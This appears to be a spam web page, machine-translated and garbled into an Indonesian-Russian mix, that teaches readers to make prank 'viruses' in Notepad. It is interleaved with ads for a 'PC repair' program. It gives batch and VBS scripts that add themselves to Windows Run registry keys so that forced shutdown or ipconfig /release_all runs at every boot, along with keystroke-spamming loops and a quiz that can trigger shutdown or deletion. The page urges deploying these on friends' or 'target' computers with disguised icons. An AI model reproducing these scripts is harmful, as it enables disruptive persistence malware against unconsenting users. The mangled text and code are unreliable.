You are currently viewing Решение для Membuat Spyware Dengan Notepad

Решение для Membuat Spyware Dengan Notepad

Если Membuat Spyware Dengan выдает небольшую ошибку в блокноте, сегодняшняя статья поможет вам.

Быстрый и простой ремонт ПК

  • 1. Скачайте и установите ASR Pro
  • 2. Откройте программу и нажмите "Сканировать"
  • 3. Нажмите "Восстановить", чтобы начать процесс восстановления.
  • Наслаждайтесь быстрее

    Siapa sih yang tidak takut dengan seed компьютерное состояние? компьютерный вирус terkena, maka besar kemungkinan домашний компьютер kamu jadi tidak bisa digunakan. Apalagi jika komputer kamu kena salah satu dari 20 вирусов komputer paling berbahaya dunia di.Tamat sudah, antara harus beli komputer baru atau put ulang.

    Di balik seramnya serangan вирусный компьютер, maka berikan jalantikus kamu kumpulan script nuller buat membuat вирусный компьютерный sederhana. Мау Биар Нггак? kelihatan pintar canoe nullr profesional gitu.simak 7 script shhh membuat вирус sederhana dengan блокнот.

    7 Membuat Virus Sederhana Hack Script

    Sudah tahu virus komputer itu berbahaya, kok JalanTikus bagikan cara membuat virusnya sih? Я. карена вирус компьютерная рабочая станция ян JalanTikus bagikan ини кума berisi единица программного обеспечения sederhana ян акан mengacaukan fungsi tanpa komputer merusak компьютерное оборудование atau membokorkan informasi ян Американская стоматологическая ассоциация ди dalamnya. Jadi Aman David Kokok Untuk digunakan computer menjahili teman kamu.

    1. Мембуат Стоп

    Вирус вируса kerja pester komputer sederhana ini adalah dengan memaksa komputer teman atau target jadi Shutdown. Untuk melakunnya, silakan buka Notepad, john copy paste code bawah di. Lalu save file-nya nama dengan ForceShutdown.bat write certificate file-nya File all.

    <код>@Эхо выключеносообщение какое-то. мне не кажется, что тыshutdown -c “Ошибка! Компьютер почти выключен!” -С УЧАСТИЕМ

    Быстрый и простой ремонт ПК

    Ваш компьютер работает немного медленнее, чем раньше? Возможно, вы получаете все больше и больше всплывающих окон, или ваше интернет-соединение кажется немного неустойчивым. Не волнуйтесь, есть решение! ASR Pro — это революционно новое программное обеспечение, которое поможет вам решить все эти надоедливые проблемы с Windows одним нажатием кнопки. С ASR Pro ваш компьютер будет работать как новый в кратчайшие сроки!

  • 1. Скачайте и установите ASR Pro
  • 2. Откройте программу и нажмите "Сканировать"
  • 3. Нажмите "Восстановить", чтобы начать процесс восстановления.

  • Untuk mengaktifkan персональный компьютер ini, kamu harus klik только два приложения kali pada-nya. Мака, Otomatis secara virusini akan berjalan.

    2. Пакса Сетиап Кали Денган Диньялакан Остановка

    berbeda sebelumnya антивирус, sederhana вирус простого герпеса янь ини акан memaksa komputer teman kamu untuk shutdown setiap kali dinyalakan. Айтс, джанган асал гунакан персональный компьютер ини кало сиап гак танггунг акибатня я!

    <код>эхо @echo off>c:windowshartlell.batэхо-дамп>>c:windowshartlell.batecho -r shutdown -huge 88 -f>>c:windowshartlell.batэхо конец>>c:windowshartlell.batreg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI Reg_sz /t /d c:windowshartlell.bat /freg содержит hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz C:windowshartlell /d.bat /fэхо Вас взломали.ПАУЗА

    Симпан изучает buatan kamu atas di dengan nama hampi semua. Jangan lupa ekstensi gunakan .бить тебя! Нажмите «Отключить менее активно».

    3. Mematikan Internet Secara Постоянный

    Saat berada ди suatu онлайн, jaringan pasti kesal dong jika American Dental Assoc. Скачать Оранг Ян Малах? Bikin обмена мгновенными сообщениями в Интернете lemot karena bandwith berkurang cepat. Makanya, coba Internet matikan teman kamu menggunakan sederhana berikut, вирусный сценарий:

    <код>эхо @echo off>c:windowswimn32.batэхо-взрыв>>c:windowswimn32.batэхо ipconfig/release_all>>c:windowswimn32.batэхо-конец>>c:windowswimn32.batreg import hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI Reg_sz /t /d c:windowswimn32.bat /freg build hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t /d reg_sz c:windowswimn32.bat /fecho Вы недавно взломали!ПАУЗА

    Sepertibias, simpandengan nama hampi semua gunakan david ekstensi.bat. Lalu klik untuk mengaktifkannya!

    4. Капс Лок

    Siapa yang tidak kesal jika American Dental Association или ngetik isinya huruf besar semua? Orang Yang minerima pesan dengan huruf besar semua jelas akan terganggu, merasa atau bahkan marah. Makanya, yuk isengin teman kamu dengan membuat Caps tombol Lock-nya nyala terus menggunakan вирусный скрипт sederhana berikut:

    Кроме того, скопируйте и вставьте код из документации в блокнот, просто оставьте его в сопровождении команды ForceCapsLock.vbs и типа документа All File. Нажмите второй kali buat mulai mengaktifkan sederhana computer virus ini.

    5. ВирусАлай

    Сиапа полностью делает cuma anak muda kekinian doang yang bisa alay? Компьютер kamu juga bisa alay loh kalo pathogen terinspeksi computer keys alay. Нет, Buat Membuat Virus Computer Jan Akan Membuat PC Keyboard Jadi Alai, Kamu Bisa Gunakan Software Sama, Bericut:

    Скопируйте Caranya и код вещества в блокнот. Сохраните файл как ForceAlay.vbs и запишите весь файл.

    6. Вирус Оранг Джелек

    membuat spy ware dengan notepad

    Узнайте, что вам нужно. Кало кума секали дуа кали сих харушна масих биса дитахан, тапи кало терус-терусан нгатай гимана джелек коба? Нет, dengan kode di bawah ini, kamu bisa membuat sebuah антивирусный портативный компьютер sederhana yang akan memaksa komputer target buat mengeluarkan wary bahwa ‘dia jelek’ tanpa heti.

    <код>Установить значение wshShellwscript.CreateObject(“WScript.Shell”)Делатьwscript.sleep 100wshshell.sendkeys “Компьютер Мука Лу Джелек Каяк Лу“Лента

    Копировать, не говоря уже о вставке скрипта, используемого в блокноте. О иа, каму биса багиан ганти варна мерах денган ката-ката сесуай селера, лалу денган нама магазин VirusOrangJelek.vbs.

    7. Викторина Вирус

    Semua orang suka kuis kalo apalagi Berhadiah. Tapi kamu bakal kesal deh pasti setiap kalo kali mau buka komputer, ternyata yang nongol adalah kuis. Да, я могу? Buat kamu yang mau isengin target workstation dengan kuis-kuis menyebalkan, coba kamu gunakan незаконная программа berikut:

    <код>@Эхо выключеноМеня зовут Куис хари ини!:МенюклассифицироватьEcho Jika kamu kena hsv apa yang kamu pilih lakukan?ЛоматьЭхо Ян Ман:эхо 1. Утренний компьютерЭхо 2. формат ajaЭхо 3. НангисЭхо 4. Бели Компьютер БарEnter = ничего не устанавливатьустановить /p ввод = выбрать:если %input%==1 -h остановить -tтридцатьесли %input%==2 избавиться от c:xxxесли %input%==3 @ECHO может быть отключенглутамат натрия * желейная мука Камюсообщение * Нгача дулу гих!msg * Hayo читает, CPU читает gw acak-acak ya4. Тема Ouda, установка oolang ajamsg mau kelar kan [email protected]Эхо выключено:вышеНАЧАТЬ %SystemRoot%system32notepad.exeВставать

    Скопируйте и составьте блокнот с ViruzQuiz nama.bat. Селесай, тинггал джаланкан буат менгуджинья.

    Agar berjalan lancar, coba simpan file virus komputer sederhana yang kamu buat komputer di team with. Lalu letakkan отчет краткий di table, джон джанган лупа убах значок